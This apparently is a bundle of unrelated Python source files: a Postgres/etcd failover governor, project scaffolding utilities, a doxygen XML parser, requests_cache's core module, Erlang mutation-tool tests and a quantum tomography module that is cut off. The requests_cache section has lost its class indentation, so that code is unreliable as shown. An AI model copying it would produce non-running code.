#!/usr/bin/env python
import sys, os, yaml, time, urllib2, atexit, signal
import logging
from helpers.keystore import Etcd
from helpers.postgresql import Postgresql
from helpers.ha import Ha
from helpers.ascii import splash, showtime
# Log at DEBUG when the DEBUG env var is set, otherwise at INFO.
LOG_LEVEL = logging.DEBUG if os.getenv('DEBUG', None) else logging.INFO
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s', level=LOG_LEVEL)

# load passed config file, or default
config_file = 'postgres0.yml'
if len(sys.argv) > 1:
    config_file = sys.argv[1]

with open(config_file, "r") as f:
    # safe_load avoids arbitrary Python object construction from the YAML
    # file (yaml.load without an explicit Loader is unsafe and deprecated).
    config = yaml.safe_load(f.read())

# allow config setting from env, for docker
if os.getenv('GOVERNOR_ETCD_HOST'):
    config['etcd']['host'] = os.getenv('GOVERNOR_ETCD_HOST')
# Flat postgresql keys share one naming scheme: GOVERNOR_POSTGRESQL_<KEY>.
for _pg_key in ('name', 'connect', 'listen', 'read_only_port', 'data_dir'):
    _pg_env = os.getenv('GOVERNOR_POSTGRESQL_%s' % _pg_key.upper())
    if _pg_env:
        config['postgresql'][_pg_key] = _pg_env
# Nested replication setting handled separately.
if os.getenv('GOVERNOR_POSTGRESQL_REPLICATION_NETWORK'):
    config['postgresql']['replication']['network'] = os.getenv('GOVERNOR_POSTGRESQL_REPLICATION_NETWORK')

# Wire up the three collaborators: the etcd keystore, the local postgres
# manager, and the HA state machine coordinating them.
etcd = Etcd(config["etcd"])
postgresql = Postgresql(config["postgresql"])
ha = Ha(postgresql, etcd)
# leave things clean when shutting down, if possible
def shutdown(signal, frame):
    """SIGTERM handler: abdicate leadership, deregister, stop postgres, exit.

    Best-effort: etcd failures are logged but never prevent the local
    postgres instance from being stopped.
    """
    logging.info("Governor Shutting Down: Received Shutdown Signal")
    try:
        if ha.has_lock():
            logging.info("Governor Shutting Down: Abdicating Leadership")
            etcd.abdicate(postgresql.name)
        logging.info("Governor Shutting Down: Removing Membership")
        etcd.delete_member(postgresql.name)
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # are not swallowed; etcd errors are still only logged.
        logging.exception("Error during Abdication")
    logging.info("Governor Shutting Down: Stopping Postgres")
    postgresql.stop()
    sys.exit(0)
def graceful_reload(signal, frame):
    """SIGHUP handler: ask postgres to reload its configuration in place."""
    logging.info("Governor Running: Received HUP Signal - Reloading")
    postgresql.reload()
# atexit.register(shutdown)
signal.signal(signal.SIGTERM, shutdown)
signal.signal(signal.SIGHUP, graceful_reload)

# wait for etcd to be available
splash()
logging.info("Governor Starting up: Connect to Etcd")
etcd_ready = False
while not etcd_ready:
    try:
        # Registering our member key doubles as the connectivity check.
        etcd.touch_member(postgresql.name, postgresql.advertised_connection_string)
        etcd_ready = True
    except urllib2.URLError:
        logging.info("waiting on etcd")
        time.sleep(5)

# is data directory empty?
if postgresql.data_directory_empty():
    logging.info("Governor Starting up: Empty Data Dir")
    # racing to initialize: exactly one node wins the /initialize key and
    # runs initdb; everyone else syncs from the resulting leader.
    if etcd.race("/initialize", postgresql.name):
        logging.info("Governor Starting up: Initialisation Race ... WON!!!")
        logging.info("Governor Starting up: Initialise Postgres")
        postgresql.initialize()
        logging.info("Governor Starting up: Initialise Complete")
        etcd.take_leader(postgresql.name)
        logging.info("Governor Starting up: Starting Postgres")
        postgresql.start(master=True)
    else:
        logging.info("Governor Starting up: Initialisation Race ... LOST")
        # Give the race winner time to finish initialising before syncing.
        time.sleep(20)
        logging.info("Governor Starting up: Sync Postgres from Leader")
        synced_from_leader = False
        while not synced_from_leader:
            leader = etcd.current_leader()
            if not leader:
                time.sleep(5)
                continue
            if postgresql.sync_from_leader(leader):
                logging.info("Governor Starting up: Sync Completed")
                postgresql.write_recovery_conf(leader)
                logging.info("Governor Starting up: Starting Postgres")
                postgresql.start(master=False)
                synced_from_leader = True
            else:
                time.sleep(5)
else:
    logging.info("Governor Starting up: Existing Data Dir")
    # Data already present: come up as a replica and let the HA loop decide.
    postgresql.copy_pg_hba()
    postgresql.follow_no_leader()
    logging.info("Governor Starting up: Starting Postgres")
    postgresql.start(master=False)

showtime()
logging.info("Governor Running: Starting Running Loop")
# Main HA loop: run one state-machine cycle per iteration, keep replication
# slots for peers when leading, and refresh our member key in etcd.
while True:
    try:
        logging.info("Governor Running: %s" % ha.run_cycle())
        # create replication slots
        if postgresql.is_leader():
            logging.debug("Governor Running: I am the Leader")
            for member in etcd.members():
                member = member['hostname']
                if member != postgresql.name:
                    postgresql.create_replication_slot(member)
        etcd.touch_member(postgresql.name, postgresql.advertised_connection_string)
    except SystemExit as e:
        # Raised by the shutdown handler; noted here, process exits via signal.
        logging.info("Governor Shutting Down: Exiting Running Loop")
    except Exception as e:
        logging.exception("Unexpected error: %s" % e)
    finally:
        # Pace the loop regardless of success or failure.
        time.sleep(config["loop_wait"])
|
# Reads n and prints the first n odd numbers (1, 3, 5, ...), one per line.
n = int(input("Digite o valor de n: "))
for k in range(n):
    print(2 * k + 1)
# -*- coding: utf-8 -*-
"""Utility functions for mkpyproject
"""
from typing import Optional
import os
import re
from datetime import datetime
import logging
def _get_logger() -> logging.Logger:
    """Create the module logger with a DEBUG-level stream handler attached."""
    logger = logging.getLogger(__name__)
    ch = logging.StreamHandler()
    ch.setLevel(logging.DEBUG)
    formatter = logging.Formatter("[%(asctime)s] %(message)s")
    ch.setFormatter(formatter)
    logger.addHandler(ch)
    return logger


LOGGER = _get_logger()

# Directory of this module, and of the template files bundled next to it.
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
FILES_DIR = os.path.join(FILE_DIR, "files")


def write_file(
    dir_name: str,
    file_name: str,
    content: Optional[str] = None,
    overwrite: bool = False,
):
    """Writes content to file.

    Arguments
    ---------
    dir_name: str
        The directory of the file.
    file_name: str
        The name of the file (including extension).
    content: str
        The content of the file.
    overwrite: bool
        Overwrites file if it already exists, otherwise raises exception.

    Raises
    ------
    FileNotFoundError:
        If the directory does not exist.
    FileExistsError:
        File exists and `overwrite` is False.
    """
    LOGGER.info("Writing '%s/%s' with overwrite = %r", dir_name, file_name, overwrite)
    if not os.path.exists(dir_name):
        raise FileNotFoundError(f"Directory '{dir_name}' does not exist.")
    file_dir = os.path.join(dir_name, file_name)
    if os.path.exists(file_dir) and not overwrite:
        # Raise FileExistsError as documented above (was a ValueError, which
        # contradicted the docstring's advertised contract).
        raise FileExistsError(f"File '{file_dir}' exists and overwrite is turned off.")
    content = content or ""
    with open(file_dir, "w") as out:
        out.write(content)
class PyProject:
    """Project class for creating predefined folders and writing files."""

    def __init__(
        self,
        project_name: str,
        author: Optional[str] = None,
        verbose: Optional[int] = 0,
    ) -> None:
        """Initializes a project with a given name and author

        Arguments
        ---------
        project_name: str
            Name of the python project.
        author: str
            Name of the project author.
        verbose: int
            Print additional output if `verbose > 0`.
        """
        self.project_name = project_name
        self.author = author
        # Normalize None to 0 so the comparisons below cannot raise TypeError.
        verbose = verbose or 0
        self.verbose = verbose
        if verbose == 1:
            LOGGER.setLevel(logging.INFO)
        if verbose > 1:
            LOGGER.setLevel(logging.DEBUG)

    @property
    def project_name_clean(self) -> str:
        """Converts project name to identifier if possible

        Lower-cases the name and replaces spaces and hyphens with underscores.
        """
        # Raw string: "[ \-]" as a plain literal is an invalid escape sequence.
        return re.sub(r"[ \-]", "_", self.project_name.lower())

    def make_project_dirs(self) -> None:
        """Creates project directories.

        Creates the project root plus the package, tests, notebooks and docs
        directories; package and tests get an empty `__init__.py`.

        Raises
        ------
        ValueError:
            If the cleaned project name is not a valid Python identifier.
        """
        if not self.project_name_clean.isidentifier():
            raise ValueError(
                "Project name must fulfill PEP8"
                " (`self.project_name.isidentifier() == True`)"
            )
        LOGGER.info("Creating '%s'.", self.project_name)
        if not os.path.exists(self.project_name):
            os.mkdir(self.project_name)
        for dir_name in [self.project_name_clean, "tests"]:
            this_dir = os.path.join(self.project_name, dir_name)
            LOGGER.info("Creating '%s'.", this_dir)
            os.mkdir(this_dir)
            write_file(this_dir, "__init__.py")
        for dir_name in ["notebooks", "docs"]:
            this_dir = os.path.join(self.project_name, dir_name)
            LOGGER.info("Creating '%s'.", this_dir)
            os.mkdir(this_dir)

    def write_license(
        self, license_kind: str = "MIT", year: Optional[int] = None
    ) -> None:
        """Creates file 'LICENSE.md' in project root.

        Imports information from 'files/LICENSE-{license_kind}.md' and substitutes
        project author and year if possible.

        Arguments
        ---------
        license_kind: str
            Kind of license. Currently only 'MIT' is implemented.
        year: int
            Year of the copyright. If `None` year will be the current year.
        """
        if license_kind == "MIT":
            with open(os.path.join(FILES_DIR, "LICENSE-MIT.md"), "r") as inp:
                license_text = inp.read()
        else:
            # f-prefix was missing, so the message printed the literal
            # placeholder instead of the requested license kind.
            raise ValueError(f"Unknown license '{license_kind}'.")
        if self.author:
            license_text = license_text.replace("{COPYRIGHT HOLDER}", self.author)
        year = year or datetime.now().year
        license_text = license_text.replace("{YEAR}", str(year))
        write_file(self.project_name, "LICENSE.md", license_text)

    def write_gitignore(self):
        """Creates file '.gitignore' in project root.

        Imports information from 'files/.gitignore'.
        """
        with open(os.path.join(FILES_DIR, ".gitignore"), "r") as inp:
            gitignore_text = inp.read()
        write_file(self.project_name, ".gitignore", gitignore_text)

    def write_requirements(self):
        """Creates empty file 'requirements.txt' in project root.
        """
        write_file(self.project_name, "requirements.txt")

    def write_setup(self):
        """Creates file 'setup.py' in project root.

        Imports information from 'files/setup.py' and substitutes project name and
        author if possible.
        """
        with open(os.path.join(FILES_DIR, "setup.py"), "r") as inp:
            setup_text = inp.read()
        setup_text = setup_text.replace(r"{project_name}", self.project_name)
        setup_text = setup_text.replace(
            r"{project_name_clean}", self.project_name_clean
        )
        setup_text = setup_text.replace("{author}", self.author or "None")
        write_file(self.project_name, "setup.py", setup_text)

    def write_readme(self):
        """Creates file 'README.md' in project root.

        Imports information from 'files/README.md' and substitutes project name and
        author if possible.
        """
        with open(os.path.join(FILES_DIR, "README.md"), "r") as inp:
            readme_text = inp.read()
        readme_text = readme_text.replace(r"{project_name}", self.project_name)
        if self.author:
            readme_text = readme_text.replace("{author}", self.author)
        write_file(self.project_name, "README.md", readme_text)
|
"""
Classes from the 'CoreMIDI' framework.
"""
try:
    from rubicon.objc import ObjCClass
except ValueError:
    # NOTE(review): the import is guarded against ValueError specifically --
    # presumably what rubicon raises when no Objective-C runtime is available;
    # confirm. The stub makes every class lookup below resolve to None.
    def ObjCClass(name):
        return None


def _Class(name):
    """Resolve an Objective-C class by name, or None if unavailable."""
    try:
        return ObjCClass(name)
    except NameError:
        return None


# CoreMIDI framework classes (None when the ObjC bridge cannot resolve them).
MIDINetworkConnection = _Class("MIDINetworkConnection")
MIDINetworkHost = _Class("MIDINetworkHost")
MIDINetworkSession = _Class("MIDINetworkSession")
MIDICIResponder = _Class("MIDICIResponder")
MIDICIDiscoveryManager = _Class("MIDICIDiscoveryManager")
MIDICIDiscoveredNode = _Class("MIDICIDiscoveredNode")
BLEMIDIAccessor = _Class("BLEMIDIAccessor")
MIDICISession = _Class("MIDICISession")
MIDICIProfileState = _Class("MIDICIProfileState")
MIDICIProfile = _Class("MIDICIProfile")
MIDICIDeviceInfo = _Class("MIDICIDeviceInfo")
|
from .entities import Compound, Entity, Class, File, Struct, Namespace
from . import xml
import os
from typing import List, Dict
class ParserBase:
    """Base class holding the location of the generated doxygen XML tree."""

    def __init__(self, xmldir : str):
        # Directory that contains the doxygen-generated XML files.
        self._xmldir = xmldir

    def _reffile(self, refid : str) -> str:
        """Return the path of the XML file belonging to *refid*."""
        filename = "{}.xml".format(refid)
        return os.path.join(self._xmldir, filename)

    def _load(self, refid : str) -> xml.NodeType:
        """Parse the XML file for *refid* and return its root node."""
        tree = xml.etree.parse(self._reffile(refid))
        return tree.getroot()
class Parser(ParserBase):
    """Parses a doxygen XML index and every compound referenced from it.

    Builds ``compounds`` (top-level entities in index order), ``entities``
    (fully-qualified name -> Entity) and an internal refid -> Entity map.
    """

    def __init__(self, xmldir : str):
        super().__init__(xmldir)
        self.compounds : List[Compound] = []
        self.entities : Dict[str, Entity] = {}
        self._refidmap : Dict[str, Entity] = {}
        self._root = self._load("index")
        for child in self._root:
            if child.tag == "compound":
                self._handle_compound(child)
        delkeys = []
        items = list(self.entities.items())
        # reset all entity keys to their fqns
        for k, v in items:
            if k != v.fqn:
                self.entities[v.fqn] = v
                delkeys.append(k)
        # recreate all parent fqns stored in entities
        # (the self-assignment presumably triggers the `parent` property
        # setter, re-resolving the stored reference -- TODO confirm)
        for k, v in items:
            v.parent = v.parent
        # now remove obsolete partial fqns
        for k in delkeys:
            del self.entities[k]

    def _handle_compound(self, node : xml.NodeType) -> None:
        """Load one <compound> index entry and register the resulting entity.

        Raises
        ------
        ValueError:
            If the compound kind is not class/struct/file/namespace.
        """
        refid = node.attrib["refid"]
        kind = node.attrib["kind"]
        refroot = self._load(refid)
        cmpdef = refroot.find("compounddef")
        assert cmpdef is not None
        if kind == "class":
            cls = Class(cmpdef, self.entities, self._refidmap)
            self.compounds.append(cls)
            self.entities[cls.fqn] = cls
            self._refidmap[cls.refid] = cls
        elif kind == "struct":
            strct = Struct(cmpdef, self.entities, self._refidmap)
            self.compounds.append(strct)
            self.entities[strct.fqn] = strct
            self._refidmap[strct.refid] = strct
        elif kind == "file":
            # Files have no fqn entry; only the refid map is updated.
            file : File = File(cmpdef, self.entities)
            self.compounds.append(file)
            self._refidmap[file.refid] = file
        elif kind == "namespace":
            ns : Namespace = Namespace(cmpdef, self.entities, self._refidmap)
            self.compounds.append(ns)
            self.entities[ns.fqn] = ns
            self._refidmap[ns.refid] = ns
        else:
            # Typo fixed in the error message ("Unkown" -> "Unknown").
            raise ValueError("Unknown compound %s" % kind)
|
# User-uploaded media files: public URL prefix and on-disk storage location.
# NOTE(review): relies on `os` and `BASE_DIR` being defined earlier in this
# settings module -- confirm against the full file.
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
|
from spatialfilter import CAR, Whitening, SymWhitening, CSP, Deflate
from timefreq import TFC
from filter import Filter, OnlineFilter, Winsorize
from window import SlidingWindow, OnlineSlidingWindow
from wrapper import Decimate, Slice
from nonstat import SlowSphering
|
#!/usr/bin/env python
"""
requests_cache.core
~~~~~~~~~~~~~~~~~~~
Core functions for configuring cache and monkey patching ``requests``
"""
from contextlib import contextmanager
from datetime import datetime, timedelta
from operator import itemgetter
import requests
from requests import Session as OriginalSession
from requests.hooks import dispatch_hook
from . import backends
class CachedSession(OriginalSession):
"""Requests ``Sessions`` with caching support."""
def __init__(
self,
cache_name='cache',
backend=None,
expire_after=None,
allowable_codes=(200,),
allowable_methods=('GET',),
filter_fn=lambda r: True,
old_data_on_error=False,
**backend_options
):
"""
:param cache_name: for ``sqlite`` backend: cache file will start with this prefix,
e.g ``cache.sqlite``
for ``mongodb``: it's used as database name
for ``redis``: it's used as the namespace. This means all keys
are prefixed with ``'cache_name:'``
:param backend: cache backend name e.g ``'sqlite'``, ``'mongodb'``, ``'redis'``, ``'memory'``.
(see :ref:`persistence`). Or instance of backend implementation.
Default value is ``None``, which means use ``'sqlite'`` if available,
otherwise fallback to ``'memory'``.
:param expire_after: ``timedelta`` or number of seconds after cache will be expired
or `None` (default) to ignore expiration
:type expire_after: float
:param allowable_codes: limit caching only for response with this codes (default: 200)
:type allowable_codes: tuple
:param allowable_methods: cache only requests of this methods (default: 'GET')
:type allowable_methods: tuple
:param filter_fn: function to apply to each response; the response is only cached if
this returns `True`. Note that this function does not not modify
the cached response in any way.
:type filter_fn: function
:kwarg backend_options: options for chosen backend. See corresponding
:ref:`sqlite <backends_sqlite>`, :ref:`mongo <backends_mongo>`
and :ref:`redis <backends_redis>` backends API documentation
:param include_get_headers: If `True` headers will be part of cache key.
E.g. after get('some_link', headers={'Accept':'application/json'})
get('some_link', headers={'Accept':'application/xml'}) is not from cache.
:param ignored_parameters: List of parameters to be excluded from the cache key.
Useful when requesting the same resource through different
credentials or access tokens, passed as parameters.
:param old_data_on_error: If `True` it will return expired cached response if update fails
"""
self.cache = backends.create_backend(backend, cache_name, backend_options)
self._cache_name = cache_name
if expire_after is not None and not isinstance(expire_after, timedelta):
expire_after = timedelta(seconds=expire_after)
self._cache_expire_after = expire_after
self._cache_allowable_codes = allowable_codes
self._cache_allowable_methods = allowable_methods
self._filter_fn = filter_fn
self._return_old_data_on_error = old_data_on_error
self._is_cache_disabled = False
super(CachedSession, self).__init__()
def send(self, request, **kwargs):
if self._is_cache_disabled or request.method not in self._cache_allowable_methods:
response = super(CachedSession, self).send(request, **kwargs)
response.from_cache = False
response.cache_date = None
return response
cache_key = self.cache.create_key(request)
def send_request_and_cache_response():
response = super(CachedSession, self).send(request, **kwargs)
if response.status_code in self._cache_allowable_codes:
self.cache.save_response(cache_key, response)
response.from_cache = False
response.cache_date = None
return response
try:
response, timestamp = self.cache.get_response_and_time(cache_key)
except (ImportError, TypeError):
return send_request_and_cache_response()
if response is None:
return send_request_and_cache_response()
if self._cache_expire_after is not None:
is_expired = datetime.utcnow() - timestamp > self._cache_expire_after
if is_expired:
if not self._return_old_data_on_error:
self.cache.delete(cache_key)
return send_request_and_cache_response()
try:
new_response = send_request_and_cache_response()
except Exception:
return response
else:
if new_response.status_code not in self._cache_allowable_codes:
return response
return new_response
# dispatch hook here, because we've removed it before pickling
response.from_cache = True
response.cache_date = timestamp
response = dispatch_hook('response', request.hooks, response, **kwargs)
return response
def request(self, method, url, params=None, data=None, **kwargs):
response = super(CachedSession, self).request(
method, url, _normalize_parameters(params), _normalize_parameters(data), **kwargs
)
if self._is_cache_disabled:
return response
main_key = self.cache.create_key(response.request)
# If self._return_old_data_on_error is set,
# responses won't always have the from_cache attribute.
if hasattr(response, "from_cache") and not response.from_cache and self._filter_fn(response) is not True:
self.cache.delete(main_key)
return response
for r in response.history:
self.cache.add_key_mapping(self.cache.create_key(r.request), main_key)
return response
@contextmanager
def cache_disabled(self):
"""
Context manager for temporary disabling cache
::
>>> s = CachedSession()
>>> with s.cache_disabled():
... s.get('http://httpbin.org/ip')
"""
self._is_cache_disabled = True
try:
yield
finally:
self._is_cache_disabled = False
def remove_expired_responses(self):
"""Removes expired responses from storage"""
if not self._cache_expire_after:
return
self.cache.remove_old_entries(datetime.utcnow() - self._cache_expire_after)
    def __repr__(self):
        """Debug representation showing backend class, cache name, expiry and
        allowed methods."""
        # NOTE: the two adjacent string literals are concatenated at compile
        # time into a single format string.
        return "<CachedSession(%s('%s', ...), expire_after=%s, " "allowable_methods=%s)>" % (
            self.cache.__class__.__name__,
            self._cache_name,
            self._cache_expire_after,
            self._cache_allowable_methods,
        )
def install_cache(
    cache_name='cache',
    backend=None,
    expire_after=None,
    allowable_codes=(200,),
    allowable_methods=('GET',),
    filter_fn=lambda r: True,
    session_factory=CachedSession,
    **backend_options
):
    """
    Installs cache for all ``Requests`` requests by monkey-patching ``Session``

    Parameters are the same as in :class:`CachedSession`. Additional parameters:

    :param session_factory: Session factory. It must be class which inherits :class:`CachedSession` (default)
    """
    if backend:
        # NOTE(review): backend_options are consumed here AND forwarded to the
        # session constructor below — confirm session_factory tolerates them
        # when an explicit backend object is created.
        backend = backends.create_backend(backend, cache_name, backend_options)
    # Subclass configured via closure so ``requests.Session()`` keeps its
    # zero-argument constructor after patching.
    class _ConfiguredCachedSession(session_factory):
        def __init__(self):
            super(_ConfiguredCachedSession, self).__init__(
                cache_name=cache_name,
                backend=backend,
                expire_after=expire_after,
                allowable_codes=allowable_codes,
                allowable_methods=allowable_methods,
                filter_fn=filter_fn,
                **backend_options
            )
    _patch_session_factory(_ConfiguredCachedSession)
def uninstall_cache():
    """Restores ``requests.Session`` and disables cache"""
    # Re-point requests.Session at the unpatched class captured at import time.
    _patch_session_factory(OriginalSession)
@contextmanager
def disabled():
    """Temporarily turn off a globally installed cache.

    .. warning:: not thread-safe

    ::

        >>> with requests_cache.disabled():
        ...     requests.get('http://httpbin.org/ip')
        ...     requests.get('http://httpbin.org/get')
    """
    # Remember whichever session class is currently installed so it can be
    # restored verbatim, then swap in the original (uncached) Session.
    current_factory = requests.Session
    uninstall_cache()
    try:
        yield
    finally:
        _patch_session_factory(current_factory)
@contextmanager
def enabled(*args, **kwargs):
    """
    Context manager for temporary installing global cache.

    Accepts same arguments as :func:`install_cache`

    .. warning:: not thread-safe

    ::

        >>> with requests_cache.enabled('cache_db'):
        ...     requests.get('http://httpbin.org/get')
    """
    install_cache(*args, **kwargs)
    try:
        yield
    finally:
        # Always restore the unpatched Session, even if the body raises.
        uninstall_cache()
def get_cache():
    """Returns internal cache object from globally installed ``CachedSession``"""
    # After install_cache(), requests.Session is a CachedSession subclass, so
    # a fresh instance exposes the shared `.cache` backend.
    return requests.Session().cache
def clear():
    """Clears globally installed cache"""
    # Delegates to the backend's clear(); requires install_cache() first.
    get_cache().clear()
def remove_expired_responses():
    """Removes expired responses from storage"""
    # Delegates to the patched session's method; a no-op unless the installed
    # cache was configured with expire_after.
    return requests.Session().remove_expired_responses()
def _patch_session_factory(session_factory=CachedSession):
    # Monkey-patch both public aliases so `requests.Session()` and
    # `requests.sessions.Session()` construct the given class.
    requests.Session = requests.sessions.Session = session_factory
def _normalize_parameters(params):
    """If builtin dict is passed as parameter, returns sorted list
    of key-value pairs
    """
    # Only plain dicts are normalized: other types (including OrderedDict,
    # which may carry meaningful ordering) are passed through untouched.
    if type(params) is not dict:
        return params
    # Dict keys are unique, so tuple comparison never falls through to the
    # values — this is equivalent to sorting on the key alone.
    return sorted(params.items())
|
#!/usr/bin/env nosetests
import os
import imp
import shutil
import subprocess
import muterl_lex
import muterl_logic
import muterl_clause
import muterl_constants
# Start every run from a clean scratch directory; cloned repos land here.
if os.path.isdir('test_tmp'):
    shutil.rmtree('test_tmp')
# Real-world Erlang projects, pinned to exact revisions for reproducibility,
# that muterl must be able to parse without errors.
good_sources = [{'name': 'jsx',
                 'git': 'https://github.com/talentdeficit/jsx',
                 'revision': 'c61be973b95ba4cc5fd646d1f80b65b8eeba8376'},
                {'name': 'mochiweb',
                 'git': 'https://github.com/mochi/mochiweb',
                 'revision': 'aacb8f2e2fd98a729bd4f54e028c6b742bfb9dcb'},
                {'name': 'poolboy',
                 'git': 'https://github.com/devinus/poolboy',
                 'revision': 'd378f996182daa6251ad5438cee4d3f6eb7ea50f'},
                {'name': 'lfe',
                 'git': 'https://github.com/rvirding/lfe',
                 'revision': 'c05fa59ecf51e345069787476b9e699e42be8cf6'}]
from nose.tools import eq_
def test_parsing():
    """Clone each pinned project and check that muterl can parse it.

    Uses an explicit loop instead of ``map``: under Python 3 ``map`` is lazy,
    so ``map(parse_source, good_sources)`` built an iterator that was never
    consumed and the test silently checked nothing.
    """
    for source in good_sources:
        parse_source(source)
def contents(filename):
    """Return the full text of *filename*."""
    with open(filename) as handle:
        return handle.read()
def parse_source(source):
    """Clone *source* at its pinned revision and run muterl's parse check.

    Args:
        source: dict with 'name', 'git' and 'revision' keys.

    Raises:
        subprocess.CalledProcessError: if cloning, checkout or parsing fails.
    """
    path = os.getcwd()
    subprocess.check_call("git clone " + source["git"] + " test_tmp/" + source["name"], shell=True)
    os.chdir(path + "/test_tmp/" + source["name"])
    subprocess.check_call("git checkout "+ source["revision"], shell=True)
    try:
        subprocess.check_call("../../muterl --check-parsing", shell=True)
    finally:
        # Always restore the working directory, even when the check fails.
        os.chdir(path)
def test_removeclause():
    """Removing each clause of simple.erl must match the golden outputs."""
    ast = muterl_lex.lex(("simple.erl", contents("test_data/simple.erl")))
    eq_(muterl_clause.clause_count(ast), 5)
    muterl_clause.clause_remove(0, ast, "test_tmp/simple_remove0.erl.res")
    muterl_clause.clause_remove(1, ast, "test_tmp/simple_remove1.erl.res")
    # diff exits non-zero (raising CalledProcessError) on any mismatch.
    subprocess.check_call("diff test_tmp/simple_remove0.erl.res test_data/simple_remove0.erl", shell=True)
    subprocess.check_call("diff test_tmp/simple_remove1.erl.res test_data/simple_remove1.erl", shell=True)
def test_inverse():
    """Logic-inversion mutation of simple2.erl must match the golden output."""
    ast = muterl_lex.lex(("simple2.erl", contents("test_data/simple2.erl")))
    muterl_logic.inverse(0, ast, "test_tmp/simple2_inverse.erl.res")
    subprocess.check_call("diff test_tmp/simple2_inverse.erl.res test_data/simple2_inverse.erl", shell=True)
def test_constants():
    """Constant-change mutation of simple2.erl must match the golden output."""
    ast = muterl_lex.lex(("simple2.erl", contents("test_data/simple2.erl")))
    muterl_constants.change(0, ast, "test_tmp/simple2_constant.erl.res")
    subprocess.check_call("diff test_tmp/simple2_constant.erl.res test_data/simple2_constant.erl", shell=True)
|
from .run import run_pauli_expectation
from .resolution import build_quasar_circuit
from .circuit import Circuit
import numpy as np
import itertools
class Tomography(object):

    """Abstract interface for tomography models of observable expectation
    values. Concrete subclasses fit a closed-form model of <O>(params) and
    implement the value/gradient/hessian evaluations below."""

    def __init__(self):
        # Abstract base: only subclasses may be instantiated.
        raise NotImplementedError

    @property
    def nparam(self):
        # int. Number of tomographed parameters.
        raise NotImplementedError

    def compute_observable_expectation_value(
        self,
        params,
        ):
        raise NotImplementedError

    def compute_observable_expectation_value_gradient(
        self,
        params,
        ):
        raise NotImplementedError

    def compute_observable_expectation_value_hessian(
        self,
        params,
        ):
        raise NotImplementedError

class RotationTomography(Tomography):

    """Tomography model for parameters that enter through single-parameter
    rotation gates (Rx, Ry, Rz).

    For such gates the expectation value is exactly:

        <O>(theta) = sum_J coefs[J] * prod_k b_{J_k}(theta_k)

    with per-parameter basis functions b = {1, cos(2 theta), sin(2 theta)},
    so a 3**nparam-point quadrature determines <O> everywhere.
    """

    def __init__(
        self,
        coefs,
        ):
        """
        Params:
            coefs (np.ndarray, shape (3,)*nparam) - expansion coefficients in
                the product {1, cos, sin} basis. A 0-d value represents a bare
                constant (no tomographed parameters).
        """
        self.coefs = coefs

    @property
    def nparam(self):
        # One tensor dimension of coefs per tomographed parameter.
        return self.coefs.ndim

    def compute_observable_expectation_value(
        self,
        params,
        ):
        """Evaluate <O> on a batch of parameter values.

        Params:
            params (np.ndarray, shape (nparam,) + grid) - parameter values.
        Returns:
            np.ndarray of shape grid - the expectation values.
        """
        if params.ndim < 2: raise RuntimeError('params.ndim < 2')
        if params.shape[0] != self.nparam: raise RuntimeError('params.shape[0] != self.nparam')
        # NOTE: Special case (bare coefficient)
        if self.coefs.ndim == 0: return self.coefs
        # Per-parameter basis functions {1, cos(2 theta), sin(2 theta)}
        bs = []
        for theta in params:
            bs.append([
                np.ones_like(theta),
                np.cos(2.0 * theta),
                np.sin(2.0 * theta),
                ])
        O = np.zeros_like(params[0])
        # Sum over all 3**nparam basis-function products
        for Js in itertools.product(range(3), repeat=self.nparam):
            R = np.ones_like(params[0])
            for J2, J in enumerate(Js):
                R *= bs[J2][J]
            O += self.coefs[Js] * R
        return O

    def compute_observable_expectation_value_gradient(
        self,
        params,
        ):
        """Analytical gradient of <O> with respect to each parameter.

        Returns:
            np.ndarray of shape (nparam,) + grid.
        """
        if params.ndim < 2: raise RuntimeError('params.ndim < 2')
        if params.shape[0] != self.nparam: raise RuntimeError('params.shape[0] != self.nparam')
        G = np.zeros((self.nparam,) + params[0].shape)
        for k in range(self.nparam):
            notk = [_ for _ in range(self.nparam) if _ != k]
            paramsk = params[k]
            params2 = params[notk]
            # Sub-tomographies over the cos (index 1) and sin (index 2) slices
            # of parameter k; d/dx cos(2x) = -2 sin(2x), d/dx sin(2x) = 2 cos(2x).
            coefs_b = np.take(self.coefs, 1, k)
            coefs_c = np.take(self.coefs, 2, k)
            tomography_b = RotationTomography(coefs_b)
            tomography_c = RotationTomography(coefs_c)
            Ob = tomography_b.compute_observable_expectation_value(params2)
            Oc = tomography_c.compute_observable_expectation_value(params2)
            G[k] = -2.0 * np.sin(2.0 * paramsk) * Ob + 2.0 * np.cos(2.0 * paramsk) * Oc
        return G

    def compute_observable_expectation_value_hessian(
        self,
        params,
        ):
        """Analytical Hessian of <O> with respect to each parameter pair.

        Returns:
            np.ndarray of shape (nparam, nparam) + grid.
        """
        if params.ndim < 2: raise RuntimeError('params.ndim < 2')
        if params.shape[0] != self.nparam: raise RuntimeError('params.shape[0] != self.nparam')
        H = np.zeros((self.nparam,)*2 + params[0].shape)
        for k in range(self.nparam):
            notk = [_ for _ in range(self.nparam) if _ != k]
            paramsk = params[k]
            params2 = params[notk]
            coefs_b = np.take(self.coefs, 1, k)
            coefs_c = np.take(self.coefs, 2, k)
            tomography_b = RotationTomography(coefs_b)
            tomography_c = RotationTomography(coefs_c)
            Ob = tomography_b.compute_observable_expectation_value(params2)
            Oc = tomography_c.compute_observable_expectation_value(params2)
            if len(notk):
                # Mixed partials come from the sub-tomography gradients
                Gb = tomography_b.compute_observable_expectation_value_gradient(params2)
                Gc = tomography_c.compute_observable_expectation_value_gradient(params2)
                H[k,notk] = -2.0 * np.sin(2.0 * paramsk) * Gb + 2.0 * np.cos(2.0 * paramsk) * Gc
            H[k, k] = - 4.0 * np.cos(2.0 * paramsk) * Ob - 4.0 * np.sin(2.0 * paramsk) * Oc
        return H

    # > Tomography quadrature utility < #

    @staticmethod
    def quad_x(D=1):
        """Quadrature grid: all 3**D combinations of {-pi/3, 0, +pi/3}."""
        return np.array(np.meshgrid(
            *[[-np.pi / 3.0, 0.0, +np.pi / 3.0]]*D,
            indexing='ij',
            ))

    @staticmethod
    def quad_transfer(D=1):
        """Transfer matrix from coefficients to quadrature values.

        NOTE(review): the 0.5**D scaling makes this NOT the exact inverse of
        quad_transfer_inv (their product is 0.5**D * I) — confirm intended.
        """
        T1 = np.array([
            [1.0, -0.5, -np.sqrt(3.0)/2.0,],
            [1.0,  1.0,  0.0,],
